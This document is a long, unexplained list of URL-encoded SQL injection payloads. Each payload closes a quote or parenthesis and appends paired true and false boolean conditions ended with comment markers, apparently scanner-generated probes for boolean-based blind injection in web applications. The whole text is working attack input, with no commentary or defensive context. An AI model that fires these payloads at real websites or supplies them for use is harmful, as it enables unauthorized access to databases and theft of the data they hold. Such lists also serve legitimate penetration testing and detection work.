foo%27%20AND%203298%3D5257%23 foo%27%20AND%202294%3D2294%23 foo%22%29%20AND%203613%3D8896%23 foo%22%29%20AND%202294%3D2294%23 foo%22%29%29%20AND%201676%3D8520%23 foo%22%29%29%20AND%202294%3D2294%23 foo%22%29%29%29%20AND%204697%3D3656%23 foo%22%29%29%29%20AND%202294%3D2294%23 foo%22%20AND%204917%3D2696%23 foo%22%20AND%202294%3D2294%23 foo%22%29%20AND%209596%3D4391%23 foo%22%29%20AND%202294%3D2294%23 foo%22%29%29%20AND%207528%3D4436%23 foo%22%29%29%20AND%202294%3D2294%23 foo%22%29%29%29%20AND%201022%3D1330%23 foo%22%29%29%29%20AND%202294%3D2294%23 foo%22%20AND%204390%3D8121%23 foo%22%20AND%202294%3D2294%23 foo%25%27%29%20AND%201297%3D6180%23 foo%25%27%29%20AND%202294%3D2294%23 foo%25%27%29%29%20AND%202494%3D6039%23 foo%25%27%29%29%20AND%202294%3D2294%23 foo%25%27%29%29%29%20AND%201932%3D9733%23 foo%25%27%29%29%29%20AND%202294%3D2294%23 foo%25%27%20AND%201560%3D3961%23 foo%25%27%20AND%202294%3D2294%23 foo%00%27%29%20AND%206551%3D9218%23 foo%00%27%29%20AND%202294%3D2294%23 foo%00%27%20AND%208358%3D5689%23 foo%00%27%20AND%202294%3D2294%23 foo%27%29%20WHERE%207303%3D7303%20AND%203103%3D5723%23 foo%27%29%20WHERE%204983%3D4983%20AND%202294%3D2294%23 foo%22%29%20WHERE%202402%3D2402%20AND%208809%3D2266%23 foo%22%29%20WHERE%203766%3D3766%20AND%202294%3D2294%23 foo%29%20WHERE%203390%3D3390%20AND%205976%3D5986%23 foo%29%20WHERE%205116%3D5116%20AND%202294%3D2294%23 foo%27%20WHERE%208181%3D8181%20AND%201482%3D2716%23 foo%27%20WHERE%208693%3D8693%20AND%202294%3D2294%23 foo%22%20WHERE%206135%3D6135%20AND%202998%3D3766%23 foo%22%20WHERE%202787%3D2787%20AND%202294%3D2294%23 foo%20WHERE%205726%3D5726%20AND%203609%3D6158%23 foo%20WHERE%208229%3D8229%20AND%202294%3D2294%23 foo%27%7C%7C%28SELECT%20%27GwFU%27%20FROM%20DUAL%20WHERE%208324%3D8324%20AND%205344%3D8863%23 foo%27%7C%7C%28SELECT%20%27VQII%27%20FROM%20DUAL%20WHERE%201913%3D1913%20AND%202294%3D2294%23 foo%27%7C%7C%28SELECT%20%27FPst%27%20WHERE%209892%3D9892%20AND%206394%3D1298%23 foo%27%7C%7C%28SELECT%20%27fzUj%27%20WHERE%206278%3D6278%20AND%202294%3D2294%23 foo%27%2B%28SELECT%20kerG%20WHERE%205091%3D5091%20AND%207450%3D9117%23 foo%27%2B%28SELECT%20UIYD%20WHERE%201644%3D1644%20AND%202294%3D2294%23 foo%27%2B%28SELECT%20%27sFlI%27%20WHERE%208435%3D8435%20AND%207928%3D9909%23 foo%27%2B%28SELECT%20%27nxZF%27%20WHERE%204143%3D4143%20AND%202294%3D2294%23 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%208969%3D2623%23 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%202294%3D2294%23 foo%29%20AND%207678%3D2138--%20 foo%29%20AND%209197%3D9197--%20 foo%27%29%20AND%203845%3D2581--%20 foo%27%29%20AND%209197%3D9197--%20 foo%27%20AND%205282%3D3545--%20 foo%27%20AND%209197%3D9197--%20 foo%22%20AND%204143%3D7082--%20 foo%22%20AND%209197%3D9197--%20 foo%29%20AND%205809%3D9282--%20 foo%29%20AND%209197%3D9197--%20 foo%29%29%20AND%204517%3D7216--%20 foo%29%29%20AND%209197%3D9197--%20 foo%29%29%29%20AND%209719%3D6874--%20 foo%29%29%29%20AND%209197%3D9197--%20 foo%20AND%201427%3D5524--%20 foo%20AND%209197%3D9197--%20 foo%27%29%20AND%203821%3D6867--%20 foo%27%29%20AND%209197%3D9197--%20 foo%27%29%29%20AND%207567%3D5960--%20 foo%27%29%29%20AND%209197%3D9197--%20 foo%27%29%29%29%20AND%204798%3D4110--%20 foo%27%29%29%29%20AND%209197%3D9197--%20 foo%27%20AND%209366%3D8158--%20 foo%27%20AND%209197%3D9197--%20 foo%27%29%20AND%209343%3D7614--%20 foo%27%29%20AND%209197%3D9197--%20 foo%27%29%29%20AND%205022%3D3767--%20 foo%27%29%29%20AND%209197%3D9197--%20 foo%27%29%29%29%20AND%208104%3D4467--%20 foo%27%29%29%29%20AND%209197%3D9197--%20 foo%27%20AND%202602%3D4682--%20 foo%27%20AND%209197%3D9197--%20 foo%22%29%20AND%206029%3D1899--%20 foo%22%29%20AND%209197%3D9197--%20 foo%22%29%29%20AND%201808%3D7260--%20 foo%22%29%29%20AND%209197%3D9197--%20 foo%22%29%29%29%20AND%207832%3D7319--%20 foo%22%29%29%29%20AND%209197%3D9197--%20 foo%22%20AND%209307%3D6585--%20 foo%22%20AND%209197%3D9197--%20 foo%22%29%20AND%201567%3D9653--%20 foo%22%29%20AND%209197%3D9197--%20 foo%22%29%29%20AND%207175%3D6552--%20 foo%22%29%29%20AND%209197%3D9197--%20 foo%22%29%29%29%20AND%204988%3D2268--%20 foo%22%29%29%29%20AND%209197%3D9197--%20 foo%22%20AND%203042%3D9133--%20 foo%22%20AND%209197%3D9197--%20 foo%25%27%29%20AND%204069%3D7798--%20 foo%25%27%29%20AND%209197%3D9197--%20 foo%25%27%29%29%20AND%204429%3D2462--%20 foo%25%27%29%29%20AND%209197%3D9197--%20 foo%25%27%29%29%29%20AND%206848%3D8870--%20 foo%25%27%29%29%29%20AND%209197%3D9197--%20 foo%25%27%20AND%208747%3D3906--%20 foo%25%27%20AND%209197%3D9197--%20 foo%00%27%29%20AND%203345%3D7453--%20 foo%00%27%29%20AND%209197%3D9197--%20 foo%00%27%20AND%205018%3D3601--%20 foo%00%27%20AND%209197%3D9197--%20 foo%27%29%20WHERE%207642%3D7642%20AND%207027%3D6713--%20 foo%27%29%20WHERE%202081%3D2081%20AND%209197%3D9197--%20 foo%22%29%20WHERE%203713%3D3713%20AND%201763%3D2103--%20 foo%22%29%20WHERE%203840%3D3840%20AND%209197%3D9197--%20 foo%29%20WHERE%204339%3D4339%20AND%209604%3D5234--%20 foo%29%20WHERE%205217%3D5217%20AND%209197%3D9197--%20 foo%27%20WHERE%203756%3D3756%20AND%209082%3D1320--%20 foo%27%20WHERE%209026%3D9026%20AND%209197%3D9197--%20 foo%22%20WHERE%209597%3D9597%20AND%206229%3D1070--%20 foo%22%20WHERE%207283%3D7283%20AND%209197%3D9197--%20 foo%20WHERE%201613%3D1613%20AND%205803%3D8970--%20 foo%20WHERE%203036%3D3036%20AND%209197%3D9197--%20 foo%27%7C%7C%28SELECT%20%27KzVs%27%20FROM%20DUAL%20WHERE%209374%3D9374%20AND%205988%3D5546--%20 foo%27%7C%7C%28SELECT%20%27UDTu%27%20FROM%20DUAL%20WHERE%206889%3D6889%20AND%209197%3D9197--%20 foo%27%7C%7C%28SELECT%20%27iylj%27%20WHERE%201466%3D1466%20AND%208850%3D2136--%20 foo%27%7C%7C%28SELECT%20%27gobO%27%20WHERE%204770%3D4770%20AND%209197%3D9197--%20 foo%27%2B%28SELECT%20BfRH%20WHERE%201107%3D1107%20AND%206525%3D1807--%20 foo%27%2B%28SELECT%20FJLd%20WHERE%206800%3D6800%20AND%209197%3D9197--%20 foo%27%2B%28SELECT%20%27mEXM%27%20WHERE%203512%3D3512%20AND%204431%3D6618--%20 foo%27%2B%28SELECT%20%27wbjI%27%20WHERE%205583%3D5583%20AND%209197%3D9197--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209281%3D6894--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209197%3D9197--%20 -2371%29%20OR%20%288080%3D5464%29 -8228%29%20OR%20%285730%3D5730%29 -8436%29%20OR%20%286383%3D1936%29 -9957%27%29%20OR%20%283468%3D7456%29 -7666%27%29%20OR%20%285730%3D5730%29 -9469%27%29%20OR%20%281430%3D5192%29 -4793%27%20OR%20%289812%3D2182%29 -9623%27%20OR%20%285730%3D5730%29 -3199%27%20OR%20%281504%3D1816%29 -4077%22%20OR%20%282022%3D3032%29 -8021%22%20OR%20%285730%3D5730%29 -5874%22%20OR%20%289733%3D6096%29 -7903%29%20OR%20%282073%3D7476%29%20AND%20%281050%3D1050 -8116%29%20OR%20%285730%3D5730%29%20AND%20%286277%3D6277 -9040%29%20OR%20%287895%3D7917%29%20AND%20%283847%3D3847 -1799%29%29%20OR%20%282373%3D6335%29%20AND%20%28%286502%3D6502 -9618%29%29%20OR%20%285730%3D5730%29%20AND%20%28%289927%3D9927 -6385%29%29%20OR%20%286804%3D1445%29%20AND%20%28%284018%3D4018 -3578%29%29%29%20OR%20%286442%3D1344%29%20AND%20%28%28%288770%3D8770 -9158%29%29%29%20OR%20%285730%3D5730%29%20AND%20%28%28%283925%3D3925 -4135%29%29%29%20OR%20%282943%3D6402%29%20AND%20%28%28%283627%3D3627 -9227%20OR%20%283078%3D8794%29 -6687%20OR%20%285730%3D5730%29 -5238%20OR%20%283152%3D3148%29 -1179%27%29%20OR%20%281792%3D9399%29%20AND%20%28%27ukSd%27%3D%27ukSd -8808%27%29%20OR%20%285730%3D5730%29%20AND%20%28%27fJNB%27%3D%27fJNB -2564%27%29%20OR%20%289855%3D3356%29%20AND%20%28%27VzZC%27%3D%27VzZC -6287%27%29%29%20OR%20%282747%3D1666%29%20AND%20%28%28%27eUlG%27%3D%27eUlG -4813%27%29%29%20OR%20%285730%3D5730%29%20AND%20%28%28%27Vuxw%27%3D%27Vuxw -6273%27%29%29%20OR%20%283302%3D1760%29%20AND%20%28%28%27CGpW%27%3D%27CGpW -9503%27%29%29%29%20OR%20%285364%3D4722%29%20AND%20%28%28%28%27wgky%27%3D%27wgky -1797%27%29%29%29%20OR%20%285730%3D5730%29%20AND%20%28%28%28%27WAxq%27%3D%27WAxq -5731%27%29%29%29%20OR%20%285776%3D7311%29%20AND%20%28%28%28%27lNPA%27%3D%27lNPA -3587%27%20OR%20%282889%3D7945%29%20AND%20%27kuTv%27%3D%27kuTv -2761%27%20OR%20%285730%3D5730%29%20AND%20%27jrJv%27%3D%27jrJv -1570%27%20OR%20%283670%3D1057%29%20AND%20%27KGVs%27%3D%27KGVs -4268%27%29%20OR%20%285430%3D5546%29%20AND%20%28%27QFgr%27%20LIKE%20%27QFgr -9223%27%29%20OR%20%285730%3D5730%29%20AND%20%28%27Naso%27%20LIKE%20%27Naso -7894%27%29%20OR%20%284012%3D7951%29%20AND%20%28%27qzHo%27%20LIKE%20%27qzHo -1393%27%29%29%20OR%20%283994%3D9057%29%20AND%20%28%28%27jDZR%27%20LIKE%20%27jDZR -7378%27%29%29%20OR%20%285730%3D5730%29%20AND%20%28%28%27NIjD%27%20LIKE%20%27NIjD -9618%27%29%29%20OR%20%282470%3D2313%29%20AND%20%28%28%27xxFo%27%20LIKE%20%27xxFo -5372%27%29%29%29%20OR%20%287705%3D3896%29%20AND%20%28%28%28%27EGff%27%20LIKE%20%27EGff -4098%27%29%29%29%20OR%20%285730%3D5730%29%20AND%20%28%28%28%27yNJK%27%20LIKE%20%27yNJK -3770%27%29%29%29%20OR%20%283423%3D8300%29%20AND%20%28%28%28%27kCgM%27%20LIKE%20%27kCgM -3051%27%20OR%20%281391%3D4030%29%20AND%20%27saqn%27%20LIKE%20%27saqn -1710%27%20OR%20%285730%3D5730%29%20AND%20%27GFZl%27%20LIKE%20%27GFZl -2520%27%20OR%20%281252%3D6199%29%20AND%20%27VPKm%27%20LIKE%20%27VPKm -8882%22%29%20OR%20%286919%3D8595%29%20AND%20%28%22Scrd%22%3D%22Scrd -3578%22%29%20OR%20%285730%3D5730%29%20AND%20%28%22kpIJ%22%3D%22kpIJ -2204%22%29%20OR%20%289768%3D6942%29%20AND%20%28%22qvUw%22%3D%22qvUw -9099%22%29%29%20OR%20%288184%3D2365%29%20AND%20%28%28%22GWkz%22%3D%22GWkz -9475%22%29%29%20OR%20%285730%3D5730%29%20AND%20%28%28%22BCvo%22%3D%22BCvo -5916%22%29%29%20OR%20%287894%3D4360%29%20AND%20%28%28%22vTcl%22%3D%22vTcl -1391%22%29%29%29%20OR%20%286339%3D1152%29%20AND%20%28%28%28%22GygX%22%3D%22GygX -8647%22%29%29%29%20OR%20%285730%3D5730%29%20AND%20%28%28%28%22ljxG%22%3D%22ljxG -8650%22%29%29%29%20OR%20%281218%3D5414%29%20AND%20%28%28%28%22MPsN%22%3D%22MPsN -8724%22%20OR%20%284045%3D3620%29%20AND%20%22BJfr%22%3D%22BJfr -4954%22%20OR%20%285730%3D5730%29%20AND%20%22eJKE%22%3D%22eJKE -2437%22%20OR%20%285633%3D7647%29%20AND%20%22BiZV%22%3D%22BiZV -8697%22%29%20OR%20%288194%3D3078%29%20AND%20%28%22btvp%22%20LIKE%20%22btvp -6609%22%29%20OR%20%285730%3D5730%29%20AND%20%28%22TOnf%22%20LIKE%20%22TOnf -1202%22%29%20OR%20%283084%3D6888%29%20AND%20%28%22cyFV%22%20LIKE%20%22cyFV -2339%22%29%29%20OR%20%288973%3D8467%29%20AND%20%28%28%22wHFd%22%20LIKE%20%22wHFd -3039%22%29%29%20OR%20%285730%3D5730%29%20AND%20%28%28%22dDje%22%20LIKE%20%22dDje -6324%22%29%29%20OR%20%288594%3D2366%29%20AND%20%28%28%22krfO%22%20LIKE%20%22krfO -1723%22%29%29%29%20OR%20%288770%3D3908%29%20AND%20%28%28%28%22rvbK%22%20LIKE%20%22rvbK -3088%22%29%29%29%20OR%20%285730%3D5730%29%20AND%20%28%28%28%22Eemy%22%20LIKE%20%22Eemy -8253%22%29%29%29%20OR%20%285856%3D6503%29%20AND%20%28%28%28%22jBTj%22%20LIKE%20%22jBTj -8633%22%20OR%20%284503%3D2555%29%20AND%20%22AcYD%22%20LIKE%20%22AcYD -5239%22%20OR%20%285730%3D5730%29%20AND%20%22LpVl%22%20LIKE%20%22LpVl -9191%22%20OR%20%283613%3D1346%29%20AND%20%22NZUO%22%20LIKE%20%22NZUO -8593%25%27%29%20OR%20%284094%3D6881%29%20AND%20%28%27%25%27%3D%27 -9348%25%27%29%20OR%20%285730%3D5730%29%20AND%20%28%27%25%27%3D%27 -4275%25%27%29%20OR%20%284999%3D5867%29%20AND%20%28%27%25%27%3D%27 -5994%25%27%29%29%20OR%20%286576%3D2191%29%20AND%20%28%28%27%25%27%3D%27 -4867%25%27%29%29%20OR%20%285730%3D5730%29%20AND%20%28%28%27%25%27%3D%27 -5314%25%27%29%29%20OR%20%281337%3D1903%29%20AND%20%28%28%27%25%27%3D%27 -6309%25%27%29%29%29%20OR%20%288245%3D3840%29%20AND%20%28%28%28%27%25%27%3D%27 -5326%25%27%29%29%29%20OR%20%285730%3D5730%29%20AND%20%28%28%28%27%25%27%3D%27 -9805%25%27%29%29%29%20OR%20%282415%3D1376%29%20AND%20%28%28%28%27%25%27%3D%27 -5089%25%27%20OR%20%283058%3D4720%29%20AND%20%27%25%27%3D%27 -6644%25%27%20OR%20%285730%3D5730%29%20AND%20%27%25%27%3D%27 -3662%25%27%20OR%20%285063%3D8839%29%20AND%20%27%25%27%3D%27 -9166%00%27%29%20OR%20%282784%3D1970%29%20AND%20%28%27KMLt%27%3D%27KMLt -8522%00%27%29%20OR%20%285730%3D5730%29%20AND%20%28%27hsWx%27%3D%27hsWx -2361%00%27%29%20OR%20%286359%3D4394%29%20AND%20%28%27Xyit%27%3D%27Xyit -3309%00%27%20OR%20%286757%3D3895%29%20AND%20%27iPjs%27%3D%27iPjs -6279%00%27%20OR%20%285730%3D5730%29%20AND%20%27hVVf%27%3D%27hVVf -4934%00%27%20OR%20%288973%3D9609%29%20AND%20%27VQci%27%3D%27VQci -5711%27%29%20WHERE%203680%3D3680%20OR%20%285652%3D5202%29%20--%20 -7752%27%29%20WHERE%201424%3D1424%20OR%20%285730%3D5730%29%20--%20 -4950%27%29%20WHERE%204593%3D4593%20OR%20%289283%3D8538%29%20--%20 -3117%22%29%20WHERE%208959%3D8959%20OR%20%283729%3D9214%29%20--%20 -1969%22%29%20WHERE%205420%3D5420%20OR%20%285730%3D5730%29%20--%20 -4049%22%29%20WHERE%203887%3D3887%20OR%20%286085%3D6617%29%20--%20 -2428%29%20WHERE%201898%3D1898%20OR%20%281114%3D1844%29%20--%20 -4351%29%20WHERE%203956%3D3956%20OR%20%285730%3D5730%29%20--%20 -8245%29%20WHERE%209025%3D9025%20OR%20%283562%3D6951%29%20--%20 -9052%27%20WHERE%207849%3D7849%20OR%20%284099%3D2687%29%20--%20 -8069%27%20WHERE%202516%3D2516%20OR%20%285730%3D5730%29%20--%20 -9630%27%20WHERE%208855%3D8855%20OR%20%283290%3D3238%29%20--%20 -8751%22%20WHERE%204700%3D4700%20OR%20%287031%3D3631%29%20--%20 -9594%22%20WHERE%204285%3D4285%20OR%20%285730%3D5730%29%20--%20 -8058%22%20WHERE%205783%3D5783%20OR%20%287442%3D3612%29%20--%20 -5742%20WHERE%204798%3D4798%20OR%20%289137%3D1520%29%20--%20 -5878%20WHERE%203299%3D3299%20OR%20%285730%3D5730%29%20--%20 -2546%20WHERE%207613%3D7613%20OR%20%282450%3D9180%29%20--%20 -4276%29%20OR%20%283575%3D5994%29%23 -6658%29%20OR%20%287233%3D7233%29%23 -3861%29%20OR%20%286146%3D3735%29%23 -1696%27%29%20OR%20%288020%3D7179%29%23 -4513%27%29%20OR%20%287233%3D7233%29%23 -2864%27%29%20OR%20%284553%3D4390%29%23 -7704%27%20OR%20%283624%3D2667%29%23 -5281%27%20OR%20%287233%3D7233%29%23 -6260%27%20OR%20%287784%3D2721%29%23 -7938%22%20OR%20%282780%3D1446%29%23 -9610%22%20OR%20%287233%3D7233%29%23 -5887%22%20OR%20%289363%3D4365%29%23 -4565%29%20OR%20%286276%3D3869%29%23 -3614%29%20OR%20%287233%3D7233%29%23 -4930%29%20OR%20%288032%3D3450%29%23 -4559%29%29%20OR%20%285707%3D9959%29%23 -3305%29%29%20OR%20%287233%3D7233%29%23 -2120%29%29%20OR%20%286772%3D2295%29%23 -1537%29%29%29%20OR%20%285624%3D3898%29%23 -3129%29%29%29%20OR%20%287233%3D7233%29%23 -8170%29%29%29%20OR%20%281831%3D8240%29%23 -3948%20OR%20%287678%3D8767%29%23 -4286%20OR%20%287233%3D7233%29%23 -2518%20OR%20%281204%3D4430%29%23 -3926%27%29%20OR%20%281222%3D7787%29%23 -7690%27%29%20OR%20%287233%3D7233%29%23 -2937%27%29%20OR%20%288482%3D1769%29%23 -6329%27%29%29%20OR%20%289171%3D3595%29%23 -5055%27%29%29%20OR%20%287233%3D7233%29%23 -1067%27%29%29%20OR%20%289978%3D9141%29%23 -3345%27%29%29%29%20OR%20%285619%3D4456%29%23 -1795%27%29%29%29%20OR%20%287233%3D7233%29%23 -5514%27%29%29%29%20OR%20%287641%3D5022%29%23 -7728%27%20OR%20%289226%3D6782%29%23 -8953%27%20OR%20%287233%3D7233%29%23 -5033%27%20OR%20%289638%3D9173%29%23 -6813%27%29%20OR%20%286455%3D2260%29%23 -7573%27%29%20OR%20%287233%3D7233%29%23 -2376%27%29%20OR%20%285506%3D9180%29%23 -5980%27%29%29%20OR%20%287479%3D7785%29%23 -1123%27%29%29%20OR%20%287233%3D7233%29%23 -6005%27%29%29%20OR%20%281147%3D3753%29%23 -5826%27%29%29%29%20OR%20%282035%3D2316%29%23 -9766%27%29%29%29%20OR%20%287233%3D7233%29%23 -5630%27%29%29%29%20OR%20%286293%3D2415%29%23 -1037%27%20OR%20%289786%3D8731%29%23 -1590%27%20OR%20%287233%3D7233%29%23 -4633%27%20OR%20%285306%3D3744%29%23 -6304%22%29%20OR%20%282751%3D4640%29%23 -9410%22%29%20OR%20%287233%3D7233%29%23 -4394%22%29%20OR%20%283482%3D6244%29%23 -4735%22%29%29%20OR%20%288144%3D2183%29%23 -7840%22%29%29%20OR%20%287233%3D7233%29%23 -6751%22%29%29%20OR%20%283080%3D7307%29%23 -4098%22%29%29%29%20OR%20%283062%3D8079%29%23 -1887%22%29%29%29%20OR%20%287233%3D7233%29%23 -9196%22%29%29%29%20OR%20%285310%3D8828%29%23 -9765%22%20OR%20%283744%3D2203%29%23 -5529%22%20OR%20%287233%3D7233%29%23 -5150%22%20OR%20%287902%3D9398%29%23 -8964%22%29%20OR%20%287555%3D7690%29%23 -4453%22%29%20OR%20%287233%3D7233%29%23 -9076%22%29%20OR%20%288701%3D1543%29%23 -4899%22%29%29%20OR%20%285439%3D3970%29%23 -1536%22%29%29%20OR%20%287233%3D7233%29%23 -5835%22%29%29%20OR%20%288457%3D2874%29%23 -6207%22%29%29%29%20OR%20%288940%3D7110%29%23 -3581%22%29%29%29%20OR%20%287233%3D7233%29%23 -1146%22%29%29%29%20OR%20%286802%3D8961%29%23 -9378%22%20OR%20%286987%3D4783%29%23 -2802%22%20OR%20%287233%3D7233%29%23 -1355%22%20OR%20%288927%3D9943%29%23 -2751%25%27%29%20OR%20%285288%3D4328%29%23 -3498%25%27%29%20OR%20%287233%3D7233%29%23 -6175%25%27%29%20OR%20%288400%3D4617%29%23 -2403%25%27%29%29%20OR%20%287321%3D3845%29%23 -6183%25%27%29%29%20OR%20%287233%3D7233%29%23 -4003%25%27%29%29%20OR%20%282744%3D2412%29%23 -6711%25%27%29%29%29%20OR%20%284619%3D1447%29%23 -3496%25%27%29%29%29%20OR%20%287233%3D7233%29%23 -1700%25%27%29%29%29%20OR%20%281405%3D9183%29%23 -9616%25%27%20OR%20%286255%3D9026%29%23 -2821%25%27%20OR%20%287233%3D7233%29%23 -3697%25%27%20OR%20%287725%3D3825%29%23 -2759%00%27%29%20OR%20%287770%3D6110%29%23 -7885%00%27%29%20OR%20%287233%3D7233%29%23 -1075%00%27%29%20OR%20%289457%3D8192%29%23 -5241%00%27%20OR%20%281520%3D1173%29%23 -7800%00%27%20OR%20%287233%3D7233%29%23 -5600%00%27%20OR%20%285731%3D5631%29%23 -9782%27%29%20WHERE%204080%3D4080%20OR%20%287376%3D6410%29%23 -4847%27%29%20WHERE%201338%3D1338%20OR%20%287233%3D7233%29%23 -7758%27%29%20WHERE%201049%3D1049%20OR%20%289474%3D8710%29%23 -4792%22%29%20WHERE%208382%3D8382%20OR%20%284650%3D3254%29%23 -2548%22%29%20WHERE%208253%3D8253%20OR%20%287233%3D7233%29%23 -2204%22%29%20WHERE%206507%3D6507%20OR%20%289406%3D3070%29%23 -1834%29%20WHERE%203930%3D3930%20OR%20%286879%3D8867%29%23 -6857%29%20WHERE%205700%3D5700%20OR%20%287233%3D7233%29%23 -8267%29%20WHERE%205277%3D5277%20OR%20%281810%3D4650%29%23 -1687%27%20WHERE%208519%3D8519%20OR%20%286469%3D7225%29%23 -1191%27%20WHERE%206776%3D6776%20OR%20%287233%3D7233%29%23 -6499%27%20WHERE%202188%3D2188%20OR%20%288182%3D4206%29%23 -4341%22%20WHERE%202651%3D2651%20OR%20%287618%3D5739%29%23 -6279%22%20WHERE%203159%3D3159%20OR%20%287233%3D7233%29%23 -8811%22%20WHERE%207311%3D7311%20OR%20%282911%3D4746%29%23 -3820%20WHERE%204885%3D4885%20OR%20%285265%3D6720%29%23 -9940%20WHERE%203148%3D3148%20OR%20%287233%3D7233%29%23 -2500%20WHERE%209795%3D9795%20OR%20%287363%3D1731%29%23 -1255%29%20OR%20%283550%3D8247%29--%20 -7309%29%20OR%20%285190%3D5190%29--%20 -9856%29%20OR%20%284551%3D1689%29--%20 -2673%27%29%20OR%20%285646%3D5260%29--%20 -1262%27%29%20OR%20%285190%3D5190%29--%20 -9575%27%29%20OR%20%285906%3D9890%29--%20 -1409%27%20OR%20%286269%3D3177%29--%20 -6116%27%20OR%20%285190%3D5190%29--%20 -1556%27%20OR%20%281281%3D7044%29--%20 -4774%22%20OR%20%283821%3D7797%29--%20 -7692%22%20OR%20%285190%3D5190%29--%20 -7486%22%20OR%20%281062%3D1372%29--%20 -3456%29%20OR%20%281009%3D3693%29--%20 -8751%29%20OR%20%285190%3D5190%29--%20 -8535%29%20OR%20%287552%3D9477%29--%20 -5974%29%29%20OR%20%286221%3D4593%29--%20 -7093%29%29%20OR%20%285190%3D5190%29--%20 -7924%29%29%20OR%20%281063%3D3284%29--%20 -6191%29%29%29%20OR%20%289430%3D6893%29--%20 -7470%29%29%29%20OR%20%285190%3D5190%29--%20 -8355%29%29%29%20OR%20%284691%3D9954%29--%20 -4066%20OR%20%289919%3D2852%29--%20 -1671%20OR%20%285190%3D5190%29--%20 -6964%20OR%20%282922%3D2732%29--%20 -1652%27%29%20OR%20%287676%3D1541%29--%20 -1708%27%29%20OR%20%285190%3D5190%29--%20 -8933%27%29%20OR%20%283126%3D1945%29--%20 -6233%27%29%29%20OR%20%281247%3D9017%29--%20 -9783%27%29%29%20OR%20%285190%3D5190%29--%20 -4063%27%29%29%20OR%20%283747%3D8568%29--%20 -1953%27%29%29%29%20OR%20%282854%3D2853%29--%20 -6292%27%29%29%29%20OR%20%285190%3D5190%29--%20 -2598%27%29%29%29%20OR%20%288601%3D3733%29--%20 -5983%27%20OR%20%287986%3D9396%29--%20 -1179%27%20OR%20%285190%3D5190%29--%20 -6806%27%20OR%20%286322%3D2138%29--%20 -2416%27%29%20OR%20%284060%3D8839%29--%20 -4862%27%29%20OR%20%285190%3D5190%29--%20 -7046%27%29%20OR%20%285751%3D6909%29--%20 -5479%27%29%29%20OR%20%284646%3D9461%29--%20 -5490%27%29%29%20OR%20%285190%3D5190%29--%20 -2565%27%29%29%20OR%20%287734%3D6795%29--%20 -9694%27%29%29%29%20OR%20%284199%3D6386%29--%20 -4754%27%29%29%29%20OR%20%285190%3D5190%29--%20 -4416%27%29%29%29%20OR%20%287813%3D5689%29--%20 -7932%27%20OR%20%286437%3D1938%29--%20 -6053%27%20OR%20%285190%3D5190%29--%20 -7733%27%20OR%20%282360%3D7240%29--%20 -2254%22%29%20OR%20%286109%3D6146%29--%20 -3177%22%29%20OR%20%285190%3D5190%29--%20 -5138%22%29%20OR%20%286793%3D2640%29--%20 -2201%22%29%29%20OR%20%281433%3D1866%29--%20 -3451%22%29%29%20OR%20%285190%3D5190%29--%20 -7028%22%29%29%20OR%20%288998%3D5982%29--%20 -3194%22%29%29%29%20OR%20%285027%3D7261%29--%20 -9053%22%29%29%29%20OR%20%285190%3D5190%29--%20 -9803%22%29%29%29%20OR%20%284774%3D5220%29--%20 -7686%22%20OR%20%287632%3D6239%29--%20 -7335%22%20OR%20%285190%3D5190%29--%20 -9950%22%20OR%20%282845%3D4548%29--%20 -5532%22%29%20OR%20%283634%3D4875%29--%20 -2517%22%29%20OR%20%285190%3D5190%29--%20 -1596%22%29%20OR%20%286640%3D7882%29--%20 -6835%22%29%29%20OR%20%287201%3D5409%29--%20 -9283%22%29%29%20OR%20%285190%3D5190%29--%20 -3280%22%29%29%20OR%20%285622%3D7140%29--%20 -6047%22%29%29%29%20OR%20%284608%3D5219%29--%20 -9632%22%29%29%29%20OR%20%285190%3D5190%29--%20 -9772%22%29%29%29%20OR%20%289498%3D8522%29--%20 -9454%22%20OR%20%284772%3D1003%29--%20 -5600%22%20OR%20%285190%3D5190%29--%20 -8841%22%20OR%20%283149%3D2917%29--%20 -7714%25%27%29%20OR%20%287666%3D9872%29--%20 -8909%25%27%29%20OR%20%285190%3D5190%29--%20 -1874%25%27%29%20OR%20%282950%3D7341%29--%20 -8174%25%27%29%29%20OR%20%288858%3D9187%29--%20 -5149%25%27%29%29%20OR%20%285190%3D5190%29--%20 -5905%25%27%29%29%20OR%20%285028%3D4180%29--%20 -1226%25%27%29%29%29%20OR%20%289866%3D2983%29--%20 -5494%25%27%29%29%29%20OR%20%285190%3D5190%29--%20 -9259%25%27%29%29%29%20OR%20%288400%3D8469%29--%20 -2084%25%27%20OR%20%285959%3D2094%29--%20 -8368%25%27%20OR%20%285190%3D5190%29--%20 -7560%25%27%20OR%20%289801%3D1319%29--%20 -4727%00%27%29%20OR%20%288010%3D2719%29--%20 -8467%00%27%29%20OR%20%285190%3D5190%29--%20 -8109%00%27%29%20OR%20%281499%3D1652%29--%20 -3465%00%27%20OR%20%288002%3D6266%29--%20 -7682%00%27%20OR%20%285190%3D5190%29--%20 -9735%00%27%20OR%20%287434%3D3649%29--%20 -8339%27%29%20WHERE%208737%3D8737%20OR%20%288320%3D1244%29--%20 -8503%27%29%20WHERE%208814%3D8814%20OR%20%285190%3D5190%29--%20 -4867%27%29%20WHERE%205802%3D5802%20OR%20%282685%3D9422%29--%20 -9271%22%29%20WHERE%205201%3D5201%20OR%20%284831%3D8764%29--%20 -7115%22%29%20WHERE%206558%3D6558%20OR%20%285190%3D5190%29--%20 -4387%22%29%20WHERE%209488%3D9488%20OR%20%282771%3D4129%29--%20 -9736%29%20WHERE%208891%3D8891%20OR%20%289845%3D6554%29--%20 -5538%29%20WHERE%206633%3D6633%20OR%20%285190%3D5190%29--%20 -1902%29%20WHERE%206938%3D6938%20OR%20%287531%3D9635%29--%20 -9771%27%20WHERE%206584%3D6584%20OR%20%281986%3D4414%29--%20 -2293%27%20WHERE%205594%3D5594%20OR%20%285190%3D5190%29--%20 -5931%27%20WHERE%209884%3D9884%20OR%20%287979%3D8039%29--%20 -1997%22%20WHERE%205426%3D5426%20OR%20%282697%3D8915%29--%20 -1696%22%20WHERE%204131%3D4131%20OR%20%285190%3D5190%29--%20 -4669%22%20WHERE%208478%3D8478%20OR%20%288810%3D7763%29--%20 -2558%20WHERE%202010%3D2010%20OR%20%281392%3D7180%29--%20 -5801%20WHERE%202196%3D2196%20OR%20%285190%3D5190%29--%20 -6933%20WHERE%202735%3D2735%20OR%20%281236%3D8599%29--%20 